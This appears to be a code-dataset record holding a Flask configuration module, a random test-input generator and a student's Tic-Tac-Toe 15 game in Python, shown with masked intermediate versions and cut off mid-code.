"step-4": "<mask token>\nbasedir = os.path.abspath(os.path.dirname(__file__))\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {'development': DevelopmentConfig, 'testing': TestingConfig,\n 'production': ProductionConfig}\n",
"step-5": "import os\nimport json\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# CHECK IF PRODUCTION CONFIG EXISTS\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig\n}\n",
"step-ids": [
7,
9,
10,
11,
13
]
}
|
[
7,
9,
10,
11,
13
] |
import random
prime=[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]
t=100
print(t)
n=25
for _ in range(t):
a=random.randint(1,n)
b=random.choice(prime)
print(a,b)
for _ in range(a):
print(random.randint(1,n),end=" ")
print("")
|
normal
|
{
"blob_id": "16738e7d89bee8074f39d0b3abc3fa786faf081f",
"index": 2370,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(t)\n<mask token>\nfor _ in range(t):\n a = random.randint(1, n)\n b = random.choice(prime)\n print(a, b)\n for _ in range(a):\n print(random.randint(1, n), end=' ')\n print('')\n",
"step-3": "<mask token>\nprime = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\nt = 100\nprint(t)\nn = 25\nfor _ in range(t):\n a = random.randint(1, n)\n b = random.choice(prime)\n print(a, b)\n for _ in range(a):\n print(random.randint(1, n), end=' ')\n print('')\n",
"step-4": "import random\nprime = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\nt = 100\nprint(t)\nn = 25\nfor _ in range(t):\n a = random.randint(1, n)\n b = random.choice(prime)\n print(a, b)\n for _ in range(a):\n print(random.randint(1, n), end=' ')\n print('')\n",
"step-5": "import random\nprime=[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]\nt=100\nprint(t)\nn=25\nfor _ in range(t):\n a=random.randint(1,n)\n b=random.choice(prime)\n print(a,b)\n for _ in range(a):\n print(random.randint(1,n),end=\" \")\n print(\"\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Name: Calvin Liew
# Date: 2021-01-29
# Purpose: Video game final project, Tic-Tac-Toe 15 by Calvin Liew.
import random
# Function that reminds the users of the game rules and other instructions.
def intro():
print("""\n####### ####### ####### # #######
# # #### # ## #### # #### ###### ## #
# # # # # # # # # # # # # # # #
# # # ##### # # # # ##### # # # ##### # ######
# # # # ###### # # # # # # #
# # # # # # # # # # # # # # # #
# # #### # # # #### # #### ###### ##### #####
How to play Tic-Tac-Toe 15:
To win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers.
Board Instructions: Tell the program the position of which you would like to enter by entering the number position of
the boxes as shown below. Players can can only enter from numbers from 1-9.
| |
1 | 2 | 3
_____|_____|_____
| |
4 | 5 | 6
_____|_____|_____
| |
7 | 8 | 9
| |
""")
# Function that prints the tic-tac-toe board.
def print_board(board):
print("\n\t | |")
print("\t {} | {} | {}".format(board[0], board[1], board[2]))
print('\t_____|_____|_____')
print("\t | |")
print("\t {} | {} | {}".format(board[3], board[4], board[5]))
print('\t_____|_____|_____')
print("\t | |")
print("\t {} | {} | {}".format(board[6], board[7], board[8]))
print("\t | |")
# Function that chooses who goes first and assigns the player order.
def choose_who_first(player1, player2, player_order):
flip = random.randint(1, 2)
if flip == 1:
print("\n" + player1, "goes first.", player1, "can only play odd numbers and", player2,
"can only play even numbers from 1-9. ")
print()
player_order.append(player1)
player_order.append(player2)
return player1
elif flip == 2:
print("\n" + player2, "goes first.", player2, "can only play odd numbers and", name1,
"can only play even numbers from 1-9. ")
print()
player_order.append(player2)
player_order.append(player1)
return player2
# Function that calls the print_board() function as well as makes the moves that the players provide while checking if the moves are legal or not.
def make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order):
odd_moves = [1, 3, 5, 7, 9]
even_moves = [2, 4, 6, 8]
try:
if turn == player1:
print("\nIts your turn", player1 + ": ")
print()
p1_move_input = int(input("Move to which space? (1-9): "))
if player_order[0] == player1:
if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:
print()
p1_num_input = int(input("Enter an ODD NUMBER from 1-9: "))
if p1_num_input in odd_moves and p1_num_input not in unavailable_moves_p1:
the_board[p1_move_input - 1] = p1_num_input
unavailable_moves_p1.append(p1_num_input)
elif p1_num_input in unavailable_moves_p1:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an ODD number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p1_move_input < 1 or p1_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif player_order[1] == player1:
if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1] == 0:
print()
p1_num_input = int(input("Enter a EVEN NUMBER from 1-9: "))
if p1_num_input in even_moves and p1_num_input not in unavailable_moves_p1:
the_board[p1_move_input - 1] = p1_num_input
unavailable_moves_p1.append(p1_num_input)
elif p1_num_input in unavailable_moves_p1:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter a EVEN number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p1_move_input < 1 or p1_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
if turn == player2:
print("\nIts your turn", player2 + ": ")
print()
p2_move_input = int(input("Move to which space? (1-9): "))
if player_order[0] == player2:
if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:
print()
p2_num_input = int(input("Enter an ODD NUMBER from 1-9: "))
if p2_num_input in odd_moves and p2_num_input not in unavailable_moves_p2:
the_board[p2_move_input - 1] = p2_num_input
unavailable_moves_p2.append(p2_num_input)
elif p2_num_input in unavailable_moves_p2:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an ODD number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p2_move_input < 1 or p2_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif player_order[1] == player2:
if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1] == 0:
print()
p2_num_input = int(input("Enter a EVEN NUMBER from 1-9: "))
if p2_num_input in even_moves and p2_num_input not in unavailable_moves_p2:
the_board[p2_move_input - 1] = p2_num_input
unavailable_moves_p2.append(p2_num_input)
elif p2_num_input in unavailable_moves_p2:
print("\nINVALID INPUT, Please try again and enter a number that you haven't used. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID INPUT, Please try again and enter a EVEN number. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
elif p2_move_input < 1 or p2_move_input > 9:
print("\nINVALID INPUT, Please try again and enter a number between 1-9. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
else:
print("\nINVALID, Please try again and enter an unoccupied spot. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
except ValueError:
print("\nINVALID INPUT, Please try again and enter only in integers. ")
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
# Function that checks if any three numbers in a row/column/diagonal add up to 15. If there is, the function returns is_game_over and the game ends.
def check_game(board, winner):
is_game_over = ""
if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1] != 0 and board[2] != 0:
print_board(board)
print("\n"+str(board[0])+",", str(board[1])+",", "and", str(board[2]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4] != 0 and board[5] != 0:
print_board(board)
print("\n"+str(board[3])+",", str(board[4])+",", "and", str(board[5]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7] != 0 and board[8] != 0:
print_board(board)
print("\n"+str(board[6])+",", str(board[7])+",", "and", str(board[8]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3] != 0 and board[6] != 0:
print_board(board)
print("\n"+str(board[0])+",", str(board[3])+",", "and", str(board[6]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4] != 0 and board[7] != 0:
print_board(board)
print("\n"+str(board[1])+",", str(board[4])+",", "and", str(board[7]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5] != 0 and board[8] != 0:
print_board(board)
print("\n"+str(board[2])+",", str(board[5])+",", "and", str(board[8]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4] != 0 and board[2] != 0:
print_board(board)
print("\n"+str(board[6])+",", str(board[4])+",", "and", str(board[2]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4] != 0 and board[8] != 0:
print_board(board)
print("\n"+str(board[0])+",", str(board[4])+",", "and", str(board[8]), "add up to 15! ")
print("\n"+winner, "wins! ")
is_game_over = True
return is_game_over
# Function that prints the scoreboard and the scores of the two players. Prints after a round has ended.
def score(score1, score2, player1, player2):
print("\n\t------------------")
print("\t SCOREBOARD")
print("\t------------------")
print("\t" + " " + player1 + ":", score1)
print("\t" + " " + player2 + ":", score2)
print("\t------------------")
print()
# Function that is where most of the game takes place. Function calls other functions such as make_move_and_update, choose_who_first, score and other code that make up the game.
# Function keeps track of the player order, the board, unavailable moves, amount of rounds and other variables. The game ends in a draw when count reaches 9. At the end of the round, it asks the users if they want to play again.
def play_game(score1, score2, player1, player2):
unavailable_moves_p1 = []
unavailable_moves_p2 = []
player_order = []
the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]
count = 0
restart = ""
turn = choose_who_first(player1, player2, player_order)
input("Enter anything to start the round: ")
for i in range(10):
print_board(the_board)
make_move_and_update(the_board, turn, player1, player2, unavailable_moves_p1, unavailable_moves_p2, player_order)
count += 1
if check_game(the_board, turn):
if turn == player1:
score1 += 1
elif turn == player2:
score2 += 1
break
if count == 9:
print("No numbers added up to 15, it's a DRAW! ")
break
if turn == player1:
turn = player2
else:
turn = player1
input("\nEnter anything to continue: ")
score(score1, score2, player1, player2)
# Asks if the players want to restart. If yes, it calls the play_game function. If no, it ends the game and congratulates the overall winner.
while restart != "yes" or restart != "y" or restart != "n" or restart != "no":
restart = input("Do want to play Again? (y/n) ").lower()
if restart == "y" or restart == "yes":
print("\nLoading new round...")
play_game(score1, score2, player1, player2)
elif restart == "n" or restart == "no":
if score1 > score2:
print("\n"+player1, "is the overall winner! Congratulations!")
elif score2 > score1:
print("\n"+player2, "is the overall winner! Congratulations!")
elif score1 == score2:
print("\nBoth players have one the same amount of rounds. It's a draw! ")
print("\nThanks for playing! ")
break
else:
print("\nPlease enter YES or NO ")
print()
# This code manages the important things before the actual game starts such as the instructions, usernames, etc. Calls the play_game function.
if __name__ == "__main__":
intro()
input("Enter anything to continue: ")
print("\nEnter usernames: ")
name1 = input("\nPlayer 1, Enter your name: ").title()
name2 = input("\nPlayer 2, Enter your name: ").title()
p1_score = 0
p2_score = 0
play_game(p1_score, p2_score, name1, name2)
|
normal
|
{
"blob_id": "11259c92b005a66e5f3c9592875f478df199c813",
"index": 6993,
"step-1": "<mask token>\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\n<mask token>\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! ')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\ndef print_board(board):\n print('\\n\\t | |')\n print('\\t {} | {} | {}'.format(board[0], board[1], board[2]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[3], board[4], board[5]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[6], board[7], board[8]))\n print('\\t | |')\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n 